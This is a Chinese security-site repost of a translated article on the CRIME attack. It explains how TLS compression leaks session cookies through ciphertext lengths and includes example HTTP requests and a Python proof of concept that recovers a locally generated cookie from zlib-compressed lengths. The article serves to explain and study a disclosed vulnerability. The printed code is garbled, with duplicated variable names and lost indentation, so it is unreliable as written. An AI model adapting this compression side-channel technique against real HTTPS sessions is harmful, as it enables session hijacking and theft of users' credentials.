钢铁苍穹安全服务中心

钢铁苍穹安全服务中心致力于造网络安全行业信息门户网站,专注于网络安全技术防范,黑客攻防技术研究,网络安全技术资讯,网络安全在线沟通交流互动,DDOS攻击防御等方面的内容讨论。

请输入网址:
最近检测:www.352.cn

SSL最新攻击方法CRIME的原理及技术细节

来源:未知 时间:
 

Author:Pnig0s译[FreeBuf]
  大家可能关注过之前针对SSL的一种攻击手法,名为BEAST.这次依然是发现BEAST的两位大神Juliano Rizzo和Thai Duong发现了另一种新的攻击HTTPS的手法,与之前的相似,被称为“CRIME”。BEAST能够从SSL/TLS加密的会话中获取受害者的COOKIE值(通过进行一次会话劫持攻击)。
  BEAST是一种明文攻击通常需要:
  中间人(攻击者监听所有加密传输数据)
  通过加密连接夹带COOKIE访问
  被攻击的域
  Adaptive Javascript代码能够向被攻击域发送POST请求
  Javascript代码尝试一位一位的暴力破解Cookie的值。中间人组件能够观察到每次破解请求和响应的密文,寻找不同,一旦发现了一个,他会和执行破解的Javascript通信并继续破解下一位。
  CRIME 的原理也是相似的:通过在受害者的浏览器中运行JavaScript代码并同时监听HTTPS传输数据,我们能够解密会话Cookie。 Rizzo告诉Threatpost,”我们不需要任何浏览器插件,我们使用Javascript能够事攻击进度加快,但理论上我们其实也可以使用静态的HTML来完成。”但是目前相关CRIME的细节还未被披露,它们会在本月迟些时候发布在Ekoparty。
  然而,他们已经推测出这种攻击所依赖的一些因素。事实上,Thomas Pornin在security.stackexchange.com已经基本上正确的指出了相关技术细节。他的假设是Rizzo和Duong滥用了加密传输中的数据压缩方法。这就类似Chromium近期禁用了TLS压缩,也是因为针对这种攻击方式的一种考虑。
  基于”压缩”的信息泄露
  多亏了CORS(跨域资源共享机制)使我们能够很容易的通过JS跨域发送POST请求并携带任何的请求正文。有一个关于请求头部的限制,我们无法跨域发送和接受Cookie。但是攻击者可以直接构造出下面这样的请求:
  01.POST / HTTP/1.1
  02.Host: thebankserver.com
  03.Connection: keep-alive
  04.User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1
  05.Accept: */*
  06.Cookie: secret=XS8b1MWZ0QEKJtM1t+QCofRpCsT2u
  07.Accept-Encoding: gzip,deflate,sdch
  08.Accept-Language: en-US,en;q=0.8
  09.Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
  10.POST / HTTP/1.1
  11.Host: thebankserver.com
  12.Connection: keep-alive
  13.User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1
  14.Accept: */*
  15.Cookie: secret=?
  为了把它简单化,我们在POST请求的正文部分重复了部分POST请求头部的内容。这样就会很好的被压缩。我们要知道大部分的请求头的值(通过fingerprinting进行指纹扫描,查看navigator对象等等),只有Cookie的值是未知的。
  但是,在正文中在“secret=”后面加上我们要破解的Cookie的第一位并以此类推,我们可以暴力破解出Cookie的真实值。通过观察所有这些请求被压缩后的密文长度(通过中间人)我们可以观察出其中的不同。密文在充分压缩后会变得更短(更长的字符串会在请求中出现两次)。然后,把这些观察的结果与Js脚本通信并继续破解下一位直到所有的Cookie值被破解出来。 以上是该攻击手法的理论。
  PoC或者不可能实现!? 我们没有时间来解释所有关于MITM,Adaptive JS脚本,加密传输的建立等等这些细节,因此Xorninja写了一个脚本来检查经过zlib deflated之后的HTTP请求字符串长度并从中推断出Cookie的真实值。 但是那个脚本并不管用,因此我修改了代码并添加了一段适应性的算法(加密的长度不会每次都改变,因此有时候你不得不在破解某一位时改变POST的请求正文部分)。 而且我的这个脚本确实能够证明上面所讲的理论: POC 可以仅仅基于zlib deflated的字符串长度暴力破解出Cookie的真实值。待破解的Cookie可以为任意长度。
  那么接下来呢?这个PoC将会在之后包含所有的SSL/mitm/Javascript 与BEAST类似的上下文环境能够让我们在真实的环境中检查这种攻击方法是否有效。 可以自由的进行实验。我期待着真实的CRIME被泄露出来:)
  POC 代码:
  01.# This is supposedly what CRIME by Juliano Rizzo and Thai Duong will do
  02.# Algorithm by Thomas Pornin, coding by xorninja, improved by @kkotowicz
  03.# http://security.blogoverflow.com/2012/09/how-can-you-protect-yourself-from-crime-beasts-successor/
  04.
  05.import string
  06.import zlib
  07.import sys
  08.import random
  09. 10.charset = string.letters + string.digits + "%/+="
  11. 12.COOKIE = ''.join(random.choice(charset) for x in range(30))
  13. 14.HEADERS = ("POST / HTTP/1.1\r\n"
  15."Host: thebankserver.com\r\n"
  16."Connection: keep-alive\r\n"
  17."User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
  18."Accept: */*\r\n"
  19."Referer: https://thebankserver.com/\r\n"
  20."Cookie: secret=" + COOKIE + "\r\n"
  21."Accept-Encoding: gzip,deflate,sdch\r\n"
  22."Accept-Language: en-US,en;q=0.8\r\n"
  23."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
  24."\r\n")
  25.
  26.BODY = ("POST / HTTP/1.1\r\n"
  27."Host: thebankserver.com\r\n"
  28."Connection: keep-alive\r\n"
  29."User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
  30."Accept: */*\r\n"
  31."Referer: https://thebankserver.com/\r\n"
  32."Cookie: secret="
  33.)
  34.
  35.BODY_SUFFIX=("\r\n"
  36."Accept-Encoding: gzip,deflate,sdch\r\n"
  37."Accept-Language: en-US,en;q=0.8\r\n"
  38."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
  39."\r\n")
  40.
  41.cookie = ""
  42.
  43.def compress(data):
  44.
  45.c = zlib.compressobj()
  46.return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
  47.
  48.def findnext(b,bs,charset):
  49.#print "body len",len(b)
  50.baselen = len(compress(HEADERS +
  51.b +
  52.bs))
  53.
  54.possible_chars = []
  55.for c in charset:
  56.lenlength = len(compress(HEADERS +
  57.b +
  58.c +
  59.bs))
  60.
  61.#print repr(c), length, baselen
  62.
  63.if length <= baselen:
  64.possible_chars.append(c)
  65.
  66.#print '=', possible_chars
  67.return possible_chars
  68.
  69.def exit():
  70.print "Original cookie: %s" % COOKIE
  71.print "Leaked cookie : %s" % cookie
  72.sys.exit(1)
  73.
  74.def forward():
  75.global cookie
  76.while len(cookie) < len(COOKIE):
  77.chop = 1
  78.possible_chars = findnext(BODY + cookie, "", charset)
  79.body_tmp = BODY
  80.orig = possible_chars
  81.while not len(possible_chars) == 1:
  82.if len(body_tmp) < chop:
  83.#print "stuck at", possible_chars
  84.return False
  85.
  86.body_tmpbody_tmp = body_tmp[chop:]
  87.possible_chars = findnext(body_tmp + cookie, "", orig)
  88.
  89.cookiecookie = cookie + possible_chars[0]
  90.return True
  91.
  92.while BODY.find("\r\n") >= 0:
  93.
  94.if not forward():
  95.cookiecookie = cookie[:-1]
  96.
  97.if len(cookie) >= len(COOKIE):
  98.exit()
  99.print "reducing body"
  100.BODYBODY = BODY[BODY.find("\r\n") + 2:]
  101.
  102.exit()
  103.


 

    栏目导航




    更多>>推荐方案



    钢铁苍穹安全服务中心